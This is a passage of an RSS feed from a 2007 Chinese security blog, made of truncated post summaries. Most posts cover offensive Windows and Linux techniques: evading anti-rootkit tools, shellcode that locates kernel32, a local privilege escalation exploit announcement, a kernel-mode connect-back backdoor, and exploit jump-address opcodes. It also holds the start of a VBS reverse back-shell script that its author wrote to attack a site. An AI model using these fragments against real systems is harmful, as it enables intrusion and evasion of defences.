style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>利用伪造内核文件来绕过IceSword的检测(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/27/171002.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 27 Dec 2007 13:58:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/27/171002.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171002.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/27/171002.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171002.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171002.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 一、为什么需要伪造内核：<br><br>    IceSword（以下简称IS）为了防止一些关键系统函数（包括所有服务中断表中的函数以及IS驱动部分要使用到的一些关键函数）被 patch，它直接读取内核文件（以下简称“ntoskrnl.exe”），然后自己分析ntoskrnl.exe 的PE结构来获取关键系统函数的原始代码并且把当前内核中所有的关键系统函数还原为windows默认状态，这样保证了IS使用到的函数不被patch 过。也许你会想如果我们把还原后的函数再进行patch不还是能躲的过去吗？笔者也试过<br>.....................<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/27/171002.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171002.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-27 21:58 <a href="http://www.blogjava.net/baicker/archive/2007/12/27/171002.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>WIN下获取kernel基址的shellcode探讨(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/27/170998.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 27 Dec 2007 13:43:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/27/170998.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/170998.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/27/170998.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/170998.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/170998.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: [经典溢出攻击流程]<br>———————————<br>1. 查找Kernel32.dll基地址；<br>2. 查找GetProcAddress()函数地址；<br>3. 查找其它API函数地址；<br>4. CreateProcess()；<br>5. 远程连接。<br><br>我们都知道WINDOWS的系统功能不像UNIX的系统调用那样实现，由于WINDOWS版本的不断更新，使得系统调用对SHELLCODE几乎起不到作用。<br>但是WINDOWS是靠DLL动态链接库来实现，这就是说，如果能从KERNEL32.DLL中获取LoadLibrary()和GetProcAddress()函数的地址，我们就可以调用WINDOWS下的所有函数了。<br>所以我们需要对KERNEL32.DLL进行地址定位，这也是本文的目的。<br>................<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/27/170998.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/170998.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-27 21:43 <a href="http://www.blogjava.net/baicker/archive/2007/12/27/170998.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>SEH源码赏析之C篇(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/27/170994.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 27 Dec 2007 13:36:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/27/170994.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/170994.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/27/170994.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/170994.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/170994.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 1.起因<br>    C++程序员对try,catch,throw都应该很熟悉,能知道VC怎么实现它的人就不多了,不过网络世界使很多人知道了它与SEH (structured exception      handling）有密切关系,我也不例外,也是在若干年前从网络知道了SEH,并且大致也知道SEH的流程.但是和多数人一样在我的实践也很少直接使用 SEH,对SEH也就仅限于网络上一些文章的介绍.曾经在用Windbg对某些软件作分析,我遇到了断点失效的情况,查找资料介绍是SEH中的 Handler清除了调试寄存器,在分析.....................<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/27/170994.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/170994.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-27 21:36 <a href="http://www.blogjava.net/baicker/archive/2007/12/27/170994.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>饶过现代Anti-Rookit工具的内核模块扫描(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/27/170993.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 27 Dec 2007 13:32:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/27/170993.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/170993.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/27/170993.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/170993.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/170993.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 本文描述了一些方法，可以饶过目前主流的现代Anti-rootkit工具，包括但不限于:<br>Icesword 最新版<br>Gmer最新版<br>Rootkit unhooker 最新版<br>DarkSpy 最新版<br>AVG Anti-rootkit最新版<br>等等<br>................<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/27/170993.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/170993.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-27 21:32 <a href="http://www.blogjava.net/baicker/archive/2007/12/27/170993.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>TCP版backshell的VBS脚本</title><link>http://www.blogjava.net/baicker/archive/2007/12/22/169590.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Sat, 22 Dec 2007 08:19:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/22/169590.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/169590.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/22/169590.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/169590.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/169590.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: '搞一个特殊的站准备用的，没想到，等写完了，洞补上了，郁闷<br>'by 009, baicker@hotmail.com<br>'date:071221<br><br>Dim  revdata<br>set  sock=WScript.createobject( "MSWinsock.Winsock" ,  "WSEvent_" )<br>set  sc=createobject( "WScript.Shell" )<br>Set  fso =CreateObject( "Scripting.FileSystemObject" )<br>sock.connect  "127.0.0.1" , 1234<br>................<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/22/169590.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/169590.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-22 16:19 <a href="http://www.blogjava.net/baicker/archive/2007/12/22/169590.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>在同一个进程空间运行两个程序(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/20/169026.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 20 Dec 2007 06:36:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/20/169026.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/169026.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/20/169026.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/169026.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/169026.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>　　众所周知，bo2k可以在一个指定的进程空间(比如explorer.exe进程)做为一个线程运行。本文试图找出一种方法，使得任意exe都可以在其他进程中以线程运行(当然，这里说的"任意"是有条件的，下面会讲到)。<br>　　为行文简单起见，我把先加载的exe称为宿主，后加载的exe称为客户。对于上面的例子，explorer.exe为宿主，bo2k.exe为客户。<br>基本知识<br>　　每一个exe都有一个缺省加载基址，一般都是0x400000。如果实际加载基址和缺省基址相同，程序中的重定位表就不需要修正(fixup),否则，就必须修正重定位表；<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/20/169026.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/169026.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-20 14:36 <a href="http://www.blogjava.net/baicker/archive/2007/12/20/169026.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Windows Local Privilege Escalation Vulnerability Exploit(secdrv) for winxp &amp; win2k3</title><link>http://www.blogjava.net/baicker/archive/2007/12/17/168265.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Mon, 17 Dec 2007 08:34:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/17/168265.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/168265.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/17/168265.html#Feedback</comments><slash:comments>5</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/168265.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/168265.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: secdrv local exp<br>winxp cn sp2, win2k3 cn sp1 测试通过<br><br>之前的版本只能xp下用，这个2k3也可以了，其实前段时间朋友给过我一个这个漏洞的1day，但是朋友的东西不能乱发，这个是自己写的，发出来大家恶心一下。&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/17/168265.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/168265.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-17 16:34 <a href="http://www.blogjava.net/baicker/archive/2007/12/17/168265.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>VC编译优化设置</title><link>http://www.blogjava.net/baicker/archive/2007/11/16/160929.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 16 Nov 2007 02:20:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/11/16/160929.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/160929.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/11/16/160929.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/160929.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/160929.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: VC- Project Setting-Debug-Project Option语法解释<br><br>-优化- <br>/O1 最小化空间 minimize space<br>/Op[-] 改善浮点数一致性 improve floating-pt consistency<br>/O2 最大化速度 maximize speed<br>/Os  优选代码空间  favor code space<br>/Oa 假设没有别名 assume no aliasing<br>/Ot 优选代码速度 favor code speed<br>/Ob 内联展开（默认 n=0） inline expansion (default n=0)<br>/Ow  假设交叉函数别名  assume cross-function aliasing<br>/Od  禁用优化（默认值）  disable optimizations (default)<br>/Ox  最大化选项。(/Ogityb2 /Gs) maximum opts. (/Ogityb1 /Gs)<br>/Og  启用全局优化  &nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/11/16/160929.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/160929.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-11-16 10:20 <a href="http://www.blogjava.net/baicker/archive/2007/11/16/160929.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>程序多开器</title><link>http://www.blogjava.net/baicker/archive/2007/11/07/158863.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Wed, 07 Nov 2007 08:54:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/11/07/158863.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/158863.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/11/07/158863.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/158863.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/158863.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 使用OD反汇编修改NateOn，虽然很麻烦，最终还是搞定了，后来发现网上有段代码，直接可以实现程序多开，测试了MSN、NateOn没问题，代码如下：<br><br>.386<br>.model flat, stdcall<br>option casemap :none<br><br>include    windows.inc<br>include    user32.inc<br>include    kernel32.inc<br>includelib  user32.lib<br>includelib  kernel32.lib<br>............<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/11/07/158863.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/158863.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-11-07 16:54 <a href="http://www.blogjava.net/baicker/archive/2007/11/07/158863.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>一个简单的Linux内核后门原型(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/10/25/155822.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 25 Oct 2007 04:20:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/10/25/155822.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/155822.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/10/25/155822.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/155822.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/155822.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 这是一个在内核模块中实现的反连后门，大家看看这于应用层上的实现有什么不同吧，呵呵<br>/*<br>* Kernel mode connect backdoor,haha~<br>*<br>* just a demo module to teach you how to write a backdoor in kernel mode,<br>* i belive you can add more code to make it strong and powerful,wulala.<br>*<br>* by wzt &lt;wzt#xsec.org&gt;<br>*<br>*/<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/10/25/155822.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/155822.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-10-25 12:20 <a href="http://www.blogjava.net/baicker/archive/2007/10/25/155822.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>VBS解决终端窗口中特殊快捷键问题</title><link>http://www.blogjava.net/baicker/archive/2007/10/15/153033.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Mon, 15 Oct 2007 09:27:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/10/15/153033.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/153033.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/10/15/153033.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/153033.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/153033.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 写程序麻烦，还要传上去，幸好VBS每台服务器应该都可以运行的吧，很少会又禁止的<br>使用SendKeys搞定<br>例如呼出Cain使用果如下脚本：）<br>Set WshShell= Wscript.CreateObject("Wscript.Shell")<br>Wscript.Sleep 1500<br>WshShell.SendKeys "%{PGUP}"<br><br>以下位SendKeys的相关使用方法等<br>............<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/10/15/153033.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/153033.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-10-15 17:27 <a href="http://www.blogjava.net/baicker/archive/2007/10/15/153033.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>一些opcodes(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/10/11/152062.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 11 Oct 2007 07:49:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/10/11/152062.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/152062.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/10/11/152062.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/152062.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/152062.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>一些opcodes<br>by axis<br>2007-03-28<br><br>近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址，但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址，所以费了点时间收集了下，在这里要感谢傲少提供的机器给我去找地址。现在贴到这里，方便大家。<br><br><br>简体中文windows的通用跳转地址：(2k/XP/2k3)<br>0x7ffa45f3 jmp ecx \xff\xe1<br>0x7ffa4967 jmp ebp \xff\xe5<br>0x7ffa4a1b jmp ebx \xff\xe3<br>..................<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/10/11/152062.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/152062.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-10-11 15:49 <a href="http://www.blogjava.net/baicker/archive/2007/10/11/152062.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>TCP 相关参数解释</title><link>http://www.blogjava.net/baicker/archive/2007/09/13/144765.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 13 Sep 2007 03:03:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/09/13/144765.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/144765.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/09/13/144765.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/144765.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/144765.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: cp_syn_retries ：INTEGER<br>默认值是5<br>对于一个新建连接，内核要发送多少个 SYN 连接请求才决定放弃。不应该大于255，默认值是5，对应于180秒左右时间。(对于大负载而物理通信良好的网络而言,这个值偏高,可修改为2.这个值仅仅是针对对外的连接,对进来的连接,是由tcp_retries1 决定的)<br><br>tcp_synack_retries ：INTEGER<br>默认值是5<br>对于远端的连接请求SYN，内核会发送SYN ＋ ACK数据报，以确认收到上一个 SYN连接请求包。这是所谓的三次握手( threeway handshake)机制的第二个步骤。这里决定内核在放弃连接之前所送出的 SYN+ACK 数目。不应该大于255，默认值是5，对应于180秒左右时间。(可以根据上面的 tcp_syn_retries 来决定这个值)<br><br>tcp_keepalive_time ：INTEGER<br>默认值是7200(2小时)<br>当keepalive打开的情况下，TCP发送keepalive消息的频率。(由于目前网络&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/09/13/144765.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/144765.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-09-13 11:03 <a href="http://www.blogjava.net/baicker/archive/2007/09/13/144765.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>